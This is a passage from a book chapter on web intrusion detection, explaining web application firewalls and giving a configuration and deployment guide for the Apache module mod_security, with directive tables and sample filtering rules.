12 Web Intrusion Detection

In spite of all your efforts to secure a web server, there is one part you do not and usually cannot control in its entirety: web applications. Web application design, programming, and maintenance require a different skill set. Even if you have the skills, in a typical organization these tasks are usually assigned to someone other than a system administrator. But the problem of ensuring adequate security remains. This final chapter suggests ways to secure applications by treating them as black boxes and examining the way they interact with the environment. The techniques that do this are known under the name intrusion detection.

This chapter covers the following:

Evolution of intrusion detection
Basic intrusion detection principles
Web application firewalls
mod_security

Evolution of Web Intrusion Detection

Intrusion detection has been in use for many years. Its purpose is to detect attacks by looking at the network traffic or by looking at operating system events. The term intrusion prevention is used to refer to systems that are also capable of preventing attacks.

Today, when people mention intrusion detection, in most cases they are referring to a network intrusion detection system (NIDS). An NIDS works on the TCP/IP level and is used to detect attacks against any network service, including the web server. The job of such systems, the most popular and most widely deployed of all IDSs, is to monitor raw network packets to spot malicious payload. Host-based intrusion detection systems (HIDSs), on the other hand, work on the host level. Though they can analyze network traffic (only the traffic that arrives to that single host), this task is usually left to NIDSs. Host-based intrusion is mostly concerned with the events that take place on the host (such as users logging in and out and executing commands) and the system error messages that are generated. An HIDS can be as simple as a script watching a log file for error messages, as mentioned in Chapter 8. Integrity validation programs (such as Tripwire) are a form of HIDS. Some systems can be complex: one form of HIDS uses system call monitoring on a kernel level to detect processes that behave suspiciously.

Using a single approach for intrusion detection is insufficient. Security information management (SIM) systems are designed to manage various security-relevant events they receive from agents, where an agent can listen to the network traffic or operating system events or can work to obtain any other security-relevant information.

Because many NIDSs are in place, a large effort was made to make the most of them and to use them for web intrusion detection, too. Though NIDSs work well for the problems they were designed to address and they can provide some help with web intrusion detection, they do not and cannot live up to the full web intrusion detection potential for the following reasons:

NIDSs were designed to work with TCP/IP. The Web is based around the HTTP protocol, which is a completely new vocabulary. It comes with its own set of problems and challenges, which are different from the ones of TCP/IP.
The real problem is that web applications are not simple users of the HTTP protocol. Instead, HTTP is only used to carry the application-specific data. It is as though each application builds its own protocol on top of HTTP.
Many new protocols are deployed on top of HTTP (think of Web Services, XML-RPC, and SOAP), pushing the level of complexity further up.
Other problems, such as the inability of an NIDS to see through encrypted SSL channels (which most web applications that are meant to be secure use) and the inability to cope with a large amount of web traffic, make NIDSs insufficient tools for web intrusion detection.

Vendors of NIDSs have responded to the challenges by adding extensions to better understand HTTP. The term deep-inspection firewalls refers to systems that make an additional effort to understand the network traffic on a higher level. Ultimately, a new breed of IDSs was born. Web application firewalls (WAFs), also known as web application gateways, are designed specifically to guard web applications. Designed from the ground up to support HTTP and to exploit its transactional nature, web application firewalls often work as reverse proxies. Instead of going directly to the web application, a request is rerouted to go to a WAF first and only allowed to proceed if deemed safe.

Web application firewalls were designed from the ground up to deal with web attacks and are better suited for that purpose. NIDSs are better suited for monitoring on the network level and cannot be replaced for that purpose.

Though most vendors are focusing on supporting HTTP, the concept of application firewalls can be applied to any application and protocol. Commercial products have become available that act as proxies for other popular network protocols and for popular databases. (Zorp, at http://www.balabit.com/products/zorp/, available under a commercial and open source license, is one such product.)

Learn more about intrusion detection to gain a better understanding of common problems. I have found the following resources useful:

“Intrusion Detection FAQ” by SANS (http://www.sans.org/resources/idfaq/)
Managing Security with Snort & IDS Tools by Kerry J. Cox and Christopher Gerg (O’Reilly)

Is Intrusion Detection the Right Approach?

Sometimes there is a controversy as to whether we are correct to pursue this approach to increasing security. A common counterargument is that web intrusion detection does not solve the real problem, and that it is better to go directly to the problem and fix weak web applications. I agree with this opinion generally, but the reality is preventing us from letting go from IDS techniques:

Achieving 100-percent security is impossible because we humans have limited capabilities and make mistakes.
Attempting to approach 100-percent security is not done in most cases. In my experience, those who direct application development usually demand features, not security. Attitudes are changing, but slowly.
A complex system always contains third-party products whose quality (security-wise) is unknown. If the source code for the products is unavailable, then you are at the mercy of the vendor to supply the fixes.
We must work with existing vulnerable systems.

As a result, I recommend we raise awareness about security among management and developers. Since awareness will come slowly, do what you can in the meantime to increase security.

Log-Based Web Intrusion Detection

I already covered one form of web intrusion detection in Chapter 8. Log-based web intrusion detection makes use of the fact that web servers produce detailed access logs, where the information about every request is kept. It is also possible to create logs in special formats to control which data is collected. This cost-effective method introduces intrusion detection to a system but there is a drawback. Log-based web intrusion detection is performed only after transactions take place; therefore, attack prevention is not possible. Only detection is. If you can live with that (it is a valid decision and it depends on your threat model), then you only need to take a few steps to implement this technique:

Make sure logging is configured and takes place on all web servers.
Optionally reconfigure logging to log more information than that configured by default.
Collect all logs to a central location.
Implement scripts to examine the logs regularly, in real time or in batch mode (e.g., daily).

That is all there is to it. (Refer to Chapter 8 for a detailed discussion.)

Anti-evasion techniques

One area where network-based IDSs have had trouble with web traffic is with respect to evasion techniques (see Chapter 10). The problem is there are so many ways to alter incoming (attack) data, so it keeps the original meaning and the application interprets it, but it is modified sufficiently to sneak under the IDS radar. This is an area where dedicated web IDSs are providing significant improvement. For example, just by looking at whole HTTP requests at a time, an entire class of attacks based on request fragmentation is avoided. And because they understand HTTP well and can separate dynamic requests from requests for static resources (and so choose not to waste time protecting static requests that cannot be compromised), they can afford to apply many different anti-evasion techniques that would prove too time consuming for NIDSs.

Response monitoring and information leak prevention

Information leak prevention is a fancy name for response monitoring. In principle it is identical to request monitoring, and its goal is to watch the output for suspicious patterns and prevent the response from reaching the client when such a pattern is detected. The most likely candidates for patterns in output are credit card numbers and social security numbers. Another use for this technique is to watch for signs of successful intrusions, as I will demonstrate later in the chapter.

It is impossible to prevent information leak by a determined and skillful attacker, since he will always be able to encode the information in such a way as to prevent detection by an IDS. Still, this technique can protect when the attacker does not have full control over the server but instead tries to exploit a weakness in the application.

Using mod_security

mod_security is a web application firewall module I developed for the Apache web server. It is available under the open source GPL license, with commercial support and commercial licensing as an option. I originally designed it as a means to obtain a proper audit log, but it grew to include other security features. There are two versions of the module, one for each major Apache branch, and they are almost identical in functionality. In the Apache 2 version, mod_security uses the advanced filtering API available in that version, making interception of the response body possible. The Apache 2 version is also more efficient in terms of memory consumption. In short, mod_security does the following:

Intercepts HTTP requests before they are fully processed by the web server
Intercepts the request body (e.g., the POST payload)
Intercepts, stores, and optionally validates uploaded files
Performs anti-evasion actions automatically
Performs request analysis by processing a set of rules defined in the configuration
Intercepts HTTP responses before they are sent back to the client (Apache 2 only)
Performs response analysis by processing a set of rules defined in the configuration
Takes one of the predefined actions or executes an external script when a request or a response fails analysis (a process called detection)
Depending on the configuration, a failed request may be prevented from being processed, and a failed response may be prevented from being seen by the client (a process called prevention)
Performs audit logging

In this section, I present a deployment guide for mod_security, but the principles behind it are the same and can be applied to any web application firewall. For a detailed reference manual, visit the project documentation area at http://www.modsecurity.org/documentation/.

Introduction

The basic ingredients of every mod_security configuration are:

Anti-evasion features
Encoding validation features
Rules (to detect invalid requests)
Actions (to handle invalid requests)

The purpose of this section is to present enough information as to how these ingredients interact with each other to enable you to configure and use mod_security. The subsequent sections will cover some advanced topics to give you more insight needed in some specific cases.

Installation and basic configuration

To install mod_security, you need to compile it using the apxs tool, as you would any other module. Some contributors provide system-specific binaries for download, and I put links to their web sites at http://www.modsecurity.org/download/. If you have installed Apache from source, apxs will be with other Apache binaries in the /usr/local/apache/bin/ folder. If you cannot find the apxs tool on your system, examine the vendor-provided documentation to learn how to add it. For example, on Red Hat systems apxs is a part of the httpd-devel package.

Position to the correct source code directory (there’s one directory for each Apache branch) and execute the following commands:

# /usr/local/apache/bin/apxs -cia mod_security.c
# /usr/local/apache/bin/apachectl stop
# /usr/local/apache/bin/apachectl start

After having restarted Apache, mod_security will be active but disabled. I recommend the following configuration to enable it with minimal chances of denying legitimate requests. You can enable mod_security with fewer configuration directives. Most options have default settings that are the same as the following configurations, but I prefer to configure things explicitly rather than wonder if I understand what the default settings are:

# Enable mod_security
SecFilterEngine On
   
# Retrieve request payload
SecFilterScanPOST On
   
# Reasonable automatic validation defaults
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat Off
SecFilterNormalizeCookies Off
SecFilterCheckUnicodeEncoding Off
   
# Accept almost all byte values
SecFilterForceByteRange 1 255
   
# Reject invalid requests with status 403
SecFilterDefaultAction deny,log,status:403
   
# Only record the relevant information 
SecAuditEngine RelevantOnly
SecAuditLog /var/www/logs/audit_log
   
# Where to store temporary and intercepted files
SecUploadDir /var/www/logs/files/
# Do not store intercepted files for the time being
SecUploadKeepFiles Off
   
# Use 0 for the debug level in production
# and 4 for testing
SecFilterDebugLog /var/www/logs/modsec_debug_log
SecFilterDebugLevel 4

Starting from the top, this configuration data enables mod_security and tells it to intercept request bodies, configures settings for various encoding validation and anti-evasion features (explained below), configures the default action list to handle invalid requests, and configures the two log types.

After adding the configuration data to your httpd.conf file, make a couple of requests to the web server and examine the audit_log and modsec_debug_log files. Without any rules configured, there won’t be much output in the debug log but at least you will be certain the module is active.

Processing order

You must understand what mod_security does and in what order for every request. Generally, processing consists of four phases:

Initialization

At the beginning of this phase, mod_security determines whether it should process the request. No processing will be performed unless the module is explicitly enabled in configuration (via SecFilterEngine On). Similarly, if the module is configured only to process dynamic requests (via SecFilterEngine DynamicOnly) and the current request is for a static resource, processing will end immediately.

If the processing is to continue, the module will initialize its structures, read in the complete request body (if one is present and if request body buffering is enabled), and perform initial request validation as defined in the configuration. The initial request validation covers the whole of the request: the first line, the headers, and the parameters. If any part of the request fails validation, the request will be rejected. This will happen even if the default action (configured using the SecFilterDefaultAction directive) is configured to allow requests to proceed in case of a rule match. This exception is necessary for mod_security to have consistent internal structures to base the rest of processing on. If you do not want a request to be rejected under any circumstances, then disable all encoding validation options.

Input analysis

In the input analysis phase, the rule engine is activated to apply rules to the requests and perform actions specified in the configuration. If the request passes this phase, Apache will call the request handler to process the request.

Output analysis

The output analysis phase exists only in the Apache 2 version of the module and only occurs if output buffering is enabled. In that case, mod_security intercepts output and stores it until the entire response is generated. After that, the rule engine is activated again but this time to analyze the response data.

Logging

The logging phase is the last to take place. This phase does not depend on previous phases. For example, the mod_security rule engine may be turned off but the audit engine may continue to work. Similar to what takes place at the beginning of the initialization phase, the first task that is performed at the beginning of the logging phase is to determine whether logging should take place, based on your configuration.

Anti-evasion features

As mentioned in Chapter 10, evasion techniques can be used to sneak in malicious payload undetected by web intrusion detection software. To counter that, mod_security performs the following anti-evasion techniques automatically:

Decodes URL-encoded text (e.g., changing %26 to &)
Converts Windows folder separation characters to Unix folder separation characters (\ to /)
Removes self references (converting /./ to /)
Removes redundant folder separation characters (e.g., changing // to /)
Changes content to lowercase
Converts null bytes to spaces

Note

Automatic anti-evasion sometimes leads to somewhat unexpected results. For example, a string such as “http://” is converted to “http:/” prior to rule execution, making it impossible to match a rule that expects two consecutive forward slash characters.

Encoding validation features

In some ways, encoding validation can be treated as anti-evasion. As mentioned previously, web servers and applications are often very flexible and allow invalid requests to be processed anyway. Using one of the following encoding validation options, it is possible to restrict what is accepted:

URL encoding validation: Certain invalid URL encodings (e.g., %XV, as explained in Chapter 10) can be used to bypass application security mechanisms. When URL encoding validation is turned on for mod_security, requests will be rejected if any of the two possible invalid encoding situations are encountered: invalid hexadecimal numbers or missing hexadecimal numbers.
Unicode encoding validation: Invalid or overlong Unicode characters are often dangerous. Turning on Unicode encoding validation can detect three types of problems: invalid characters, missing bytes, and overlong characters. This type of validation is off by default since many applications do not understand Unicode, and it is not possible to detect whether they do by looking at a request. Applications that are not Unicode aware sometimes use character combinations that are valid but that resemble special Unicode characters. Unicode validation would interpret such combinations as attacks and lead to false positives.
Cookie format validation: This option enforces strict cookie formats. It is disabled by default.
Cookie value normalization: Cookie values are often URL encoded though such encoding is not mandated by the specification. Performing normalization (which includes all anti-evasion actions) on the value allows a rule to see through the encoding. However, if URL encoded cookies are not used, false positives are possible. Enable cookie value normalization only if appropriate.
Byte range validation: Some applications use a small range of byte values (such as 0-255). For example, applications designed only for the English-speaking population might only use values between 32 and 126, inclusive. Restricting the bytes that can be used in a request to a small range can be beneficial as it reduces the chances of successful buffer overflow attack. This validation option is controlled with the SecFilterForceByteRange directive (as described in the Section 12.2.5.2).

Rules

The best part of mod_security is its flexible rule engine. In the simplest form, a rule requires only a single keyword. The SecFilter directive performs a broad search against the request parameters, as well as against the request body for POST requests:

SecFilter KEYWORD

If the keyword is detected, the rule will be triggered and will cause the default action list to be executed.

The keyword is actually a regular expression pattern. Using a simple string, such as 500, will find its occurrence anywhere in the search content. To make full use of mod_security, learn about regular expressions. If you are unfamiliar with them, I suggest the link http://www.pcre.org/pcre.txt as a good starting point. If you prefer a book, check out Mastering Regular Expressions by Jeffrey E. F. Friedl (O’Reilly), which is practically a regular expression reference guide.

Here are a couple of points I consider important:

Some characters have special meanings in regular expressions. The pattern 1.1 matches string 1.1, but it also matches 101 because a dot is meant to represent any one character. To match a dot in the string, you must escape it in the pattern by preceding it with a backslash character like this: 1\.1.
If you want to match a whole string, you must use special characters to the regular expression engine, such as in ^1\.1$. The ^ character matches the beginning of the string, while the $ character matches the end. Without them, 1\.1 would match 1.1, but it would also match 1001.100.
When an exclamation mark is used as the first character in a pattern, it negates the pattern. For example, the pattern !attack causes a rule match if the searched string does not contain the pattern attack.

I will demonstrate what can be done with regular expressions with a regular expression pattern you will find useful in the real world: ^[0-9]{1,9}$. This pattern matches only numbers and only ones that have at least one but up to nine digits.

Note

Apache 1 and Apache 2 use different regular expression engines. The regular expression engine of the Apache 1 branch is not well documented. It works mostly as you would expect, but there are slight differences with the Apache 2 engine. Apache 2 bundles the PCRE engine (http://www.pcre.org), which is well documented and widely used in other open source products (such as PHP and Python). If you are normally writing regular expressions for one Apache branch, do not expect the other branch to interpret the same expressions in the same way.

Although broad rules are easy to write, they usually do not work well in real life. Their use significantly increases the chances of introducing false positives and reducing system availability to its legitimate users (not to mention the annoyance they cause). A much better approach to rule design is to consider the impact and only apply rules to certain parts of HTTP requests. This is what SecFilterSelective is for. For example, the following rule will look for the keyword only in the query string:

SecFilterSelective QUERY_STRING KEYWORD

The QUERY_STRING variable is one of the supported variables. The complete list is given in Tables Table 12-1 (standard variables available for use with mod_rewrite or CGI scripts) and Table 12-2 (extended variables specific to mod_security). In most cases, the variable names are the same as those used by mod_rewrite and the CGI specification.

Table 12-1. Standard rule variables

Variable name	Description
`REMOTE_ADDR`	IP address of the client.
`REMOTE_HOST`	Host name of the client, when available.
`REMOTE_USER`	Authenticated username, when available.
`REMOTE_IDENT`	Remote username (provided by the `identd` daemon but almost no one uses it any more).
`REQUEST_METHOD`	Request method (e.g., `GET`, `POST`).
`SCRIPT_FILENAME`	Full system path for the script being executed.
`PATH_INFO`	The extra part of the URI given after the script name. For example, if the URI is `/view.php/5`, the value of `PATH_INFO` is `/5`.
`QUERY_STRING`	The part of the URI after the question mark, when available (e.g. `id=5`).
`AUTH_TYPE`	The string `Basic` or `Digest`, when available.
`DOCUMENT_ROOT`	Path to the document root, as specified with the `DocumentRoot` directive.
`SERVER_ADMIN`	The email address of the server administrator, as specified with the `ServerAdministrator` directive.
`SERVER_NAME`	The hostname of the server, as specified with the `ServerName` directive.
`SERVER_ADDR`	The IP address of the server where the request was received.
`SERVER_PORT`	Server port where the request was received.
`SERVER_PROTOCOL`	The protocol specified in the request (e.g., `HTTP/1.1`).
`SERVER_SOFTWARE`	Apache version, as configured with `ServerTokens`.
`TIME_YEAR`	Current year (e.g., `2004`).
`TIME_MON`	Current month as a number (e.g., `10` for October).
`TIME_DAY`	Current day of month as a number.
`TIME_HOUR`	Current hour as a number in a 24-hour day (e.g., `14` for 2 PM).
`TIME_MIN`	Current minute.
`TIME_SEC`	Current second.
`TIME_WDAY`	Current weekday as a number (e.g., `4` for Thursday when Monday is considered to be the first day of the week).
`TIME`	Current time as a combination of individual elements listed above in the form `YmdHMS` (e.g., `20041014144619` for October 14 2004, 14:46:19).
`THE_REQUEST`	Complete first line of the request (e.g., `GET /view.php?id=5 HTTP/1.0`).
`REQUEST_URI`	The second token on the request line (e.g., `/view.php?id=5`).
`REQUEST_FILENAME`	A synonym for `SCRIPT_FILENAME`.

Table 12-2. Extended rule variables

Variable Name	Description
`POST_PAYLOAD`	Gives access to the raw request body except for requests using the `multipart/form-data` encoding (which is required for file uploads). In such cases, the request body will probably contain binary data and interfere with regular expressions. To get around this problem, `mod_security` takes the original request apart and re-creates and gives access to a fake request body in the `application/x-form-urlencoded` format, effectively hiding the differences between the two formats.
`HTTP_` `headername`	Value of the header `headername`. The prefix `HEADER_` (in place of `HTTP_`) will also work.
`ENV_` `envname`	Value of the environment variable `envname`.
`ARG_` `varname`	Value of the parameter `varname`.
`ARGS`	Gives direct access to a single string containing all parameters and their values, which is equal to the combined value of `QUERY_STRING` and `POST_PAYLOAD`. (The request body will be faked if necessary, as discussed above.)
`ARGS_COUNT`	Number of parameters in the request.
`ARGS_NAMES`	List of the names of all parameters given to the script.
`ARGS_VALUES`	List of the values of all parameters given to the script.
`FILE_NAME_` `varname`	The filesystem name of the file contained in the request and associated with the script parameter `varname`.
`FILE_SIZE_` `varname`	The size of file uploaded in the parameter `varname`.
`FILES_COUNT`	Number of files contained in the request.
`FILES_NAMES`	List of the filesystem names of all files contained in the request.
`FILES_SIZES`	List of the sizes of all files.
`HEADERS`	List of all request headers, in the form “Name: Value“.
`HEADERS_COUNT`	Number of headers in the request.
`HEADERS_NAMES`	List of the names of all headers in the request.
`HEADERS_VALUES`	List of the values of all headers in the request.
`SCRIPT_UID`	The `uid` of the owner of the script that will handle the request.
`SCRIPT_GID`	The `gid` of the group of the script that will handle the request.
`SCRIPT_USERNAME`	The username equivalent to the `uid`. Using a username is slower than using a `uid` since `mod_security` needs to perform a lookup every time.
`SCRIPT_GROUPNAME`	The group name equivalent to the `gid`. Using a group name is slower than using a `gid` as well.
`SCRIPT_MODE`	Script permissions, in the standard Unix format, with four digits with a leading zero (e.g., 0755).
`COOKIE_` `cookiename`	Value of the cookie `cookiename`.
`COOKIES_COUNT`	Number of cookies in the request.
`COOKIES_NAMES`	List of the names of all cookies given to the script.
`COOKIES_VALUES`	List of the values of all cookies given to the script.

When using selective rules, you are not limited to examining one field at a time. You can separate multiple variable names with a pipe. The following rule demonstrates how to access named parts of the request, in this example, a parameter and a cookie:

# Look for the keyword in the parameter "authorized"
# and in the cookie "authorized". A match in either of
# them will trigger the rule.
SecFilterSelective ARG_authorized|COOKIE_authorized KEYWORD

If a variable is absent in the current request the variable will be treated as empty. For example, to detect the presence of a variable, use the following format, which triggers execution of the default action list if the variable is not empty:

SecFilterSelective ARG_authorized !^$

A special syntax allows you to create exceptions. The following applies the rule to all parameters except the parameter html:

SecFilterSelective ARGS|!ARG_html KEYWORD

Finally, single rules can be combined to create more complex expressions. In my favorite example, I once had to deploy an application that had to be publicly available because our users were located anywhere on the Internet. The application has a powerful, potentially devastating administration account, and the login page for users and for the administrator was the same. It was impossible to use other access control methods to restrict administrative logins to an IP address range. Modifying the source code was not an option because we had no access to it. I came up with the following two rules:

SecFilterSelective ARG_username ^admin$ chain
SecFilterSelective REMOTE_ADDR !^192\.168\.254\.125$

The first rule triggers whenever someone tries to log in as an administrator (it looks for a parameter username with value admin). Without the optional action chain being specified, the default action list would be executed. Since chain is specified, processing continues with execution of the second rule. The second rule allows the request to proceed if it is coming from a single predefined IP address (192.168.254.125). The second rule never executes unless the first rule is satisfied.

Actions

You can do many things when an invalid request is discovered. The SecFilterDefaultAction determines the default action list:

# Reject invalid requests with status 403
SecFilterDefaultAction deny,log,status:403

You can override the default action list by supplying a list of actions to individual rules as the last (optional) parameter:

# Only log a warning message when the KEYWORD is found
SecFilter KEYWORD log,pass

Warning

If you use the optional third parameter to s pecify per-rule actions, you must ensure all the actions you want to take place are listed. This is because the list you supply replaces the default action list, therefore none of the default actions take place.

The full list of supported actions is given in Table 12-3.

Table 12-3. mod_security action list

Action	Description
`allow`	Skip over the remaining rules and allow the request to be processed.
`auditlog`	Log the request to the audit log.
`chain`	Chain the current rule with the one that follows. Process the next rule if the current rule matches. This feature allows many rules to be used as one, performing a logical AND.
`deny`	Deny request processing.
`exec`:`filename`	Execute the external script specified by filename on rule match.
`id`:`n`	Assign a unique ID n to the rule. The ID will appear in the log. Useful when there are many rules designed to handle the same problem.
`log`	Log the rule match. A message will go into the Apache error log and into the audit log (if such logging is enabled).
`msg`:`text`	Assign a message `text` to the rule, which will appear in the log.
`noauditlog`	Do not log the request to the audit log. All requests that trigger a rule will be written to the audit log by default (unless audit logging is completely disabled by configuration). This action should be used when you don’t want a request to appear in the audit log (e.g., it may be too long and you do not need it).
`nolog`	Do not log the rule match.
`pass`	Proceed to the next rule in spite of the current rule match. This is useful when you want to perform some action but otherwise don’t want to reject the request.
`pause`:`n`	Pause for `n` milliseconds on rule match. Be careful with this one; it makes it easy to DoS yourself by having many Apache processes sleep for too long a time.
`redirect`:`url`	Perform a redirection to the address specified by `url` when a request is denied.
`setenv`:`name``=``value`	Set the environment variable `name` to `value`. The value is optional. 1 is used if the parameter is omitted.
`skipnext`:`n`	On rule match skip the next `n` rules (or just one if the parameter is omitted).
`status`:`n`	Configure the status `n` to be used to deny the request.

Logging

There are three places where, depending on the configuration, you may find mod_security logging information:

mod_security debug log: The mod_security debug log, if enabled via the SecFilterDebugLevel and SecFilterDebugLog directives, contains a large number of entries for every request processed. Each log entry is associated with a log level, which is a number from 0 (no messages at all) to 4 (maximum logging). The higher the log level you specify, the more information you get in error logs. You normally need to keep the debug log level at 0 and increase it only when you are debugging your rule set. Excessive logging slows down server operation.
Apache error log: Some of the messages from the debug log will make it into the Apache error log (even if you set the mod_security debug log level to 0). These are the messages that require an administrator’s attention, such as information about requests being rejected.
mod_security audit log: When audit logging is enabled (using the SecAuditEngine and SecAuditLog directives), mod_security can record each request (and its body, provided request body buffering is enabled) and the corresponding response headers. (I expect future versions of mod_security will be able to log response bodies, too.) Whether or not information is recorded for all requests or only some depends on the configuration (see Chapter 8).

Here is an example of an error message resulting from invalid content discovered in a cookie:

[Tue Oct 26 17:44:36 2004] [error] [client 127.0.0.1]
mod_security: Access denied with code 500. Pattern match "!(^$|^[a-zA-Z0-9]+$)"
at COOKIES_VALUES(sessionid) [hostname "127.0.0.1"]
[uri "/cgi-bin/modsec-test.pl"] [unique_id bKjdINmgtpkAADHNDC8AAAAB]

The message indicates that the request was rejected (“Access denied”) with an HTTP 500 response because the content of the cookie sessionid contained content that matched the pattern !(^$|^[a-zA-Z0-9]+$). (The pattern allows a cookie to be empty, but if it is not, it must consist only of one or more letters and digits.)

More Configuration Advice

In addition to the basic information presented in the previous sections, some additional (important) aspects of mod_security operation are presented here.

Activation time

For each request, mod_security activities take place after Apache performs initial work on it but before the actual request processing starts. During the first part of the work, Apache sometimes decides the request can be fulfilled or rejected without going to the subsequent processing phases. Consequently, mod_security is never executed. These occurrences are not cause for concern, but you need to know about them before you start wondering why something you configured does not work.

Here are some situations when Apache finishes early:

When the request contains a URL-encoded forward slash (%2f) or null-byte (%00) character in the script path (see Chapter 2).
When the request is determined to be invalid. (For example, if the request line is too big, as is the case with some Microsoft IIS worms that roam around.)
When the request can be fulfilled by Apache directly. This is the case with the TRACE method.

Performance impact

The performance of the rule database is directly related to how many rules are in the configuration. For all normal usage patterns, the number of rules is small, and thus, there is practically no impact on the request processing speed. The only serious impact comes from increased memory consumption in the case of file uploads and Apache 1, which is covered in the next section.

In some circumstances, requests that perform file upload will be slower. If you enable the feature to intercept uploaded files, there will be an additional overhead of writing the file to disk. The exact slowdown depends on the speed of the filesystem, but it should be small.

Memory consumption

The use of mod_security results in increased memory consumption by the Apache web server. The increase can be very small, but it can be very big in some rare circumstances. Understanding why it happens will help you avoid problems in those rare circumstances.

When mod_security is not active, Apache only sees the first part of the request: the request line (the first line of the request) and the subsequent headers. This is enough for Apache to do its work. When request processing begins, the module that does the processing feeds the request body to where it needs to be consumed. In the case of PHP, for example, the request body goes directly to PHP. Apache almost never sees it. With mod_security enabled, it becomes a requirement to have access to the complete request body before processing begins. That is the only approach that can protect the application. (Early versions of mod_security did look at the body bit by bit but that proved to be insufficient.) That is why mod_security reads the complete request into its own buffer and later feeds it from there to the processing module. Additional memory space is needed so that the anti-evasion processing can take place. A buffer twice the size of the request body is required by mod_security to complete processing.

In most cases, this is not a problem since request bodies are small. The only case when it can be a problem is when file upload functionality is required. Files can be quite large (sizes of over 100 MB are not unheard of), and mod_security will want to put all of them into memory, twice. If you are running Apache 1, there is no way around this but to disable request body buffering (as described near the end of this chapter) for those parts of the application where file upload takes place. You can also (and probably should) limit the maximum size of the body by using the Apache configuration directive LimitRequestBody. But there is good news for the users of Apache 2. Because of its powerful content filtering API, mod_security for Apache 2 is able to stream the request body to the disk if its size is larger than a predefined value (using the directive SecUploadInMemoryLimit , set to 64 KB by default), so increased memory consumption does not take place. However, mod_security will need to store the complete request to the disk and read it again when it sends it forward for processing.

Per-context configuration

It is possible to use mod_security in the main server, in virtual hosts, and in per-directory contexts. Practically all configuration directives support this. (The ones that do not, such as SecChrootDir, make no sense outside of the main server configuration.) This allows a different policy to be implemented wherever necessary.

Configuration and rule inheritance is also implemented. Rules added to the main server will be inherited by all virtual hosts, but there is an option to start from scratch (using the SecFiltersInheritance directive). On the same note, you can use mod_security from within .htaccess files (if the AllowOverride option Options is specified), but be careful not to allow someone you do not trust to have access to this feature.

Tight Apache integration

Although mod_security supports the exec action, which allows a custom script to be executed upon detecting an invalid action, Apache offers two mechanisms that allow for tight integration and more flexibility.

One mechanism you should use is the ErrorDocument, which allows a script to be executed (among other things) whenever request processing returns with a particular response status code. This feature is frequently used to create a “Page not found” message. Depending on your security policy, the same feature can be used to explain that the security system you put in place believes something funny is going on and, therefore, decided to reject the request. At the same time, you can add code to the script to do something else, for example, to send a notification somewhere. An example script for Apache integration comes with the mod_security distribution.

The other thing you can do is add mod_unique_id (distributed with Apache and discussed in Chapter 8) into your configuration. After you do, this module will generate a unique ID (guaranteed to be unique within the server) for every request, storing it in the environment variable UNIQUE_ID (where it will be picked up by mod_security). This feature is great to enable you to quickly find what you are looking for. I frequently use it in the output of an ErrorDocument script, where the unique ID is presented to the user with the instructions to cite it as reference when she complains to the support group. This allows you to quickly and easily pinpoint and solve the problem.

Event monitoring

In principle, IDSs support various ways to notify you of the problems they discover. In the best-case scenario, you have some kind of monitoring system to plug the IDS into. If you do not, you will probably end up devising some way to send notifications to your email, which is a bad way to handle notifications. Everyone’s natural reaction to endless email messages from an IDS is to start ignoring them or to filter them automatically into a separate mail folder.

A better approach (see Chapter 8) is to streamline IDS requests into the error log and to implement daily reporting at one location for everything that happens with the web server. That way, when you come to work in the morning, you only have one email message to examine. You may decide to keep email notifications for some dangerous attacks—e.g., SQL injections.

Deployment Guidelines

Deploying a web firewall for a known system requires planning and careful execution. It consists of the following steps:

Learn about what you are protecting.
Decide whether an IDS is the correct choice.
Choose the IDS tool you want to deploy. This step is usually done in parallel with the next step since not all tools support all features.
Establish security policy. That is, decide what should be allowed and how you are going to respond to violations.
Install and configure the IDS tool (on a development server).
Deploy in detection mode. That is, just log violations and do not reject requests.
Monitor the implementation, react to alerts, and refine configuration to reduce false positives.
Optionally, upgrade some or all rules to the prevention mode, whereby requests that match some or all of the rules are rejected.

Probably the best advice I can give is for you to learn about the system you want to protect. I am asked all the time to provide an example of a tight mod_security configuration, but I hesitate and almost never do. Intrusion detection (like many other security techniques) is not a simple, fire-and-forget, solution in spite of what some commercial vendors say. Incorrect rules, when deployed, will result in false positives that waste analysts’ time. When used in prevention mode, false positives result in reduced system availability, which translates to lost revenue (or increased operations expenses, depending on the way you look at it).

In step 2, you need to decide whether intrusion detection can bring a noticeable increase in security. This is not the same as what I previously discussed in this chapter, that is, whether intrusion detection is a valid tool at all. Here, the effort of introducing intrusion detection needs to be weighed against other ways to solve the problem. First, understand the time commitment intrusion detection requires. If you cannot afford to follow up on all alerts produced by the system and to work continuously to tweak and improve the configuration, then you might as well give up now. The other thing to consider is the nature and the size of the system you want to protect. For smaller applications for which you have the source code, invest in a code review and fix the problems in the source code.

Establishing a protection policy is arguably the most difficult part of the work. You start with the list of weaknesses you want to protect and, having in mind the capabilities of the protection software, work out a feasible protection plan. If it turns out the tool is not capable enough, you may look for a better tool. Work on the policy is similar to the process of threat modeling discussed in Chapter 1.

Installation and configuration is the easy part and already covered in detail here. You need to work within the constraints of your selected tool to implement the previously designed policy. The key to performing this step is to work on a development server first and to test the configuration thoroughly to ensure the protection rules behave as you would expect them to. In the mod_security distribution is a tool ( run_test.pl) that can be used for automated tests. As a low-level tool, run_test.pl takes a previously created HTTP request from a text file, sends it to the server, and examines the status code of the response to determine the operation’s success. Run regression tests periodically to test your IDS.

Deploying in detection mode only is what you do to test the configuration in real life in an effort to avoid causing disturbance to normal system operation. For several weeks, the IDS should only send notifications without interrupting the requests. The configuration should then be fine-tuned to reduce the false positives rate, hopefully to zero. Once you are confident the protection is well designed (do not hurry), the system operation mode can be changed to prevention mode. I prefer to use the prevention mode only for problems I know I have. In all other cases, run in the detection mode at least for some time and see if you really have the problems you think you may have.

Note

Using only detection capabilities of the intrusion detection software is fine, provided someone will examine the alerts on a regular basis. Rejecting certain hacking attempts straight away may force the attacker to seek other evasion methods, which may be successful (that is where the attackers have the advantage). Letting them through allows you to record their attacks and subsequently close the hole.

Reasonable configuration starting point

There is a set of rules I normally use as a starting point in addition to the basic configuration given earlier. These rules are not meant to protect from direct attacks but rather to enforce strict HTTP protocol usage and make it more difficult for attackers to make manual attacks. As I warned, these rules may not be suitable for all situations. If you are running a public web site, there will be all sorts of visitors, including search engines, which may be a little bit eccentric in the way they send HTTP requests that are normal. Tight configurations usually work better in closed environments.

# Accept only valid protocol versions, helps
# fight HTTP fingerprinting.
SecFilterSelective SERVER_PROTOCOL !^HTTP/(0\.9|1\.0|1\.1)$
   
# Allow supported request methods only.
SecFilterSelective REQUEST_METHOD !^(GET|HEAD|POST)$
   
